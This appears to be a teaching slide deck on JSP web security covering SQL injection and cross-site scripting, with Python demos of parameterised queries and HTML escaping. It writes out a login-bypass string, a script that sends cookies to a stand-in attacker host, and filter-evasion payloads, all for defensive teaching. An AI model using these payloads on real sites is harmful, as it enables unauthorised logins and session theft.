
Security

Nguyn Quc Nguyn

Introduction
The various dynamic content generation environments powering the World Wide Web are intended and designed precisely to provide more power to developers and greater convenience for end-users. Security is therefore an aspect that must be explicitly factored in by the system architects and developers; it is rarely effective as an afterthought.

Introduction (cont'd)
The inputs a JSP page accepts from the client (request parameters, form fields, cookies, headers) are the immediate means by which adversaries can affect the system, and they are invariably subjected to stress during attempts to identify and exploit vulnerabilities. The universal defense against all related attacks is input validation. On a parallel level, the security exposures covered in this deck are direct consequences of two main design errors: failing to validate input before it is used to build a database query (SQL injection) and failing to filter it before it is echoed into a generated page (cross-site scripting).

Security Issues
By the sheer virtue of providing access to resources on a server, insecure Java servlets derived from JSP pages can put at risk any or all of: the server itself, the clients accessing the pages and, through possible DDoS and worm-distribution attacks, the entire Internet. Validating input and controlling access to resources always need to be considered.

SQL Injection
SQL injection is a subset of the unverified/unsanitized user input vulnerability: the idea is to convince the application to run SQL code that was not intended, via its web pages. Many web pages take parameters from the web user and build a SQL query to the database from them by string concatenation. With SQL injection it is possible to send a crafted user name and/or password field that changes the structure of that SQL query and thus grants something the developer never intended, such as a login without valid credentials.

What do you need?

Any web browser

What should you look for?

Look for pages that allow you to submit data, i.e. login pages, search pages, feedback forms. Sometimes HTML pages use the POST method to send parameters to another JSP page, so you will not see the parameters in the URL. However, you can check the HTML source and look for the FORM tag; the name attributes of its INPUT fields (including hidden ones) are the parameter names the JSP page receives.

How do you test if it is vulnerable?

Start with the single-quote trick. Enter a string such as hi' or 1=1-- into the login field, the password field, or even a URL parameter. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.jsp?id=hi' or 1=1--
If a lone quote produces a database error page, or the injected condition logs you in, the input reaches the SQL text unsanitized. Note that the comment sequence depends on the database engine: -- works in SQL Server, Oracle, PostgreSQL and SQLite, while MySQL requires a space after -- and also accepts #.
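The single-quote probe and the 1=1 bypass, worked through against a small in-memory database. This is an added example, not code from the slides: it uses Python's sqlite3 module in place of a JSP page and JDBC, the users table and the alice/s3cret credentials are constructed for the demo, and it goes one step past the slide by showing the parameterised query that closes the hole.

```python
import sqlite3


# Constructed example table; the user and credentials are invented for this demo.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, as a naive JSP login page would.
    Whatever the user typed becomes part of the SQL text, so a quote or a
    comment sequence in the input rewrites the statement."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    """Same query with bound parameters: the input is handed to the driver as
    data and can never change the structure of the statement."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def quote_probe(conn, username):
    """The single-quote trick from the slide: returns True when a stray quote
    in the input makes the database raise a syntax error, which tells the
    tester that the input reaches the query text unsanitized."""
    try:
        login_vulnerable(conn, username, "x")
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    attack = "hi' or 1=1--"
    print("quote probe on hi'  ->", quote_probe(db, "hi'"))              # True
    print("vulnerable login    ->", login_vulnerable(db, attack, attack))  # ['alice']
    print("parameterised login ->", login_safe(db, attack, attack))        # []
```

With the injected fields the concatenated statement becomes SELECT username FROM users WHERE username = 'hi' or 1=1--' AND password = '...', and everything after -- is a comment, so the WHERE clause is true for every row and the first user is "logged in". The parameterised version returns no rows because the same text is compared literally against the stored username.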

Cross Site Scripting

CERT Advisory CA-2000-02 describes the problem of malicious HTML tags embedded in client Web requests. The name "cross-site scripting" is somewhat of a misnomer, since the issue is not only about scripting and there is nothing especially cross-site about it, but the term has stuck from when the problem was less well understood.

Cross Site Scripting (2)

The attack usually consists of a malicious user submitting client-side executable scripts (e.g. JavaScript code) or malicious HTML (or XML) tags, which the JSP server then includes verbatim in a dynamically generated page. The attack may be targeted against other clients who view that page or, less commonly, against the server.

Cross Site Scripting (3)

Commonly abused tags are those that allow embedding of code inside a page, such as <SCRIPT>, <OBJECT>, <APPLET> and <EMBED>. Mitigation is achieved through input validation and output filtering: encode user-supplied data at the point where it is written into the page. A blacklist of forbidden tag names alone is easy to evade, for example with event-handler attributes on tags that are not on the list.
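The two mitigations named above, as an added example that is not code from the slides. It uses Python's html.escape for output filtering in place of a JSP page, the PAYLOAD and the other inputs are constructed for the demo, and it goes beyond the slide by showing why filtering only the four listed tag names is not sufficient.

```python
import html
import re

# Constructed attacker input: a cookie-stealing script submitted through a feedback form.
PAYLOAD = '<SCRIPT>document.location="http://attacker.example/?c="+document.cookie</SCRIPT>'

# Constructed inputs that slip past a tag-name blacklist (hypothetical, for the demo).
EVASIONS = [
    "<img src=x onerror=alert(1)>",            # no listed tag, but an event handler
    "<scr<script>ipt>alert(1)</script>",       # removing the inner tag rebuilds one
]


def render_vulnerable(comment):
    """Echoes the submitted text straight into the generated page."""
    return "<p>Your feedback: " + comment + "</p>"


def render_escaped(comment):
    """Output filtering: every character with meaning in HTML is encoded, so
    the browser displays the text instead of interpreting it."""
    return "<p>Your feedback: " + html.escape(comment, quote=True) + "</p>"


# Input validation done as a blacklist of the tag names on the slide.
TAG_BLACKLIST = re.compile(r"</?(script|object|applet|embed)\b[^>]*>", re.IGNORECASE)


def strip_blacklisted_tags(comment):
    """Removes only the listed tags; kept here to show that this is not enough."""
    return TAG_BLACKLIST.sub("", comment)


def executes_script(rendered):
    """Crude indicator used by the demo: does the HTML still contain a script
    tag or an inline event-handler attribute the browser would run?"""
    low = rendered.lower()
    return "<script" in low or re.search(r"<\w+[^>]*\son\w+\s*=", low) is not None


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))               # script tag reaches the browser
    print(render_escaped(PAYLOAD))                  # &lt;SCRIPT&gt;... is inert text
    for evasion in EVASIONS:
        print(strip_blacklisted_tags(evasion), "->", executes_script(strip_blacklisted_tags(evasion)))
```

The blacklist catches the literal PAYLOAD, but the first evasion never contained a listed tag, and stripping the inner <script> from the second one reassembles exactly the tag the filter was meant to remove. Escaping at output time neutralises all three inputs regardless of their shape, which is why output encoding, not tag filtering, is the primary defence.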
